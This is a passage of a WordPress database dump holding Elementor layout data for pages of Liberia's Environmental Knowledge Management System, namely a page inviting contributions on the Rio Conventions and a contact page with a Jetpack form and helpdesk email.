",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(19632,2874,'_elementor_edit_mode','builder'),(19633,2874,'_elementor_template_type','wp-page'),(19634,2874,'_elementor_version','2.7.5'),(19635,2874,'_wp_page_template','default'),(19636,2874,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19638,2875,'_elementor_edit_mode','builder'),(19639,2875,'_elementor_template_type','wp-page'),(19640,2875,'_elementor_version','2.7.5'),(19641,2875,'_wp_page_template','default'),(19642,2875,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f4ba53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f0e4e09\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"47dfd77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1f5f1b5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Submission Forms:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming soon!\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19646,2876,'_elementor_edit_mode','builder'),(19647,2876,'_elementor_template_type','wp-page'),(19648,2876,'_elementor_version','2.7.5'),(19649,2876,'_wp_page_template','default'),(19650,2876,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f4ba53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f0e4e09\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"47dfd77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1f5f1b5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Submission Forms:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming soon!\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19651,2876,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}}}}'),(19653,74,'ocean_post_layout','full-width'),(19705,2881,'_elementor_edit_mode','builder'),(19706,2881,'_elementor_template_type','wp-page'),(19707,2881,'_elementor_version','2.7.5'),(19708,2881,'_wp_page_template','default'),(19709,2881,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"14e66f0\",\"elType\":\"widget\",\"settings\":{\"html\":\"<!-- wp:jetpack\\/contact-form {\\\"subject\\\":\\\"Contact Form message\\\",\\\"to\\\":\\\"contact@ekmsliberia.info\\\",\\\"hasFormSettingsSet\\\":\\\"yes\\\",\\\"customThankyou\\\":\\\"message\\\"} -->\\r\\n\\r\\n<!-- wp:jetpack\\/field-name {\\\"required\\\":true} \\/-->\\r\\n\\r\\n<!-- wp:jetpack\\/field-email {\\\"required\\\":true} \\/-->\\r\\n\\r\\n<!-- wp:jetpack\\/field-select {\\\"required\\\":true,\\\"options\\\":[\\\"Documents (Policies Reports Case Studies Guides etc)\\\",\\\"Biodiversity\\\",\\\"Climate Change\\\",\\\"Desertification\\\",\\\"News or Blogs\\\",\\\"General Inquiry\\\"]} \\/-->\\r\\n\\r\\n<!-- wp:jetpack\\/field-textarea \\/--><!-- \\/wp:jetpack\\/contact-form -->\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin 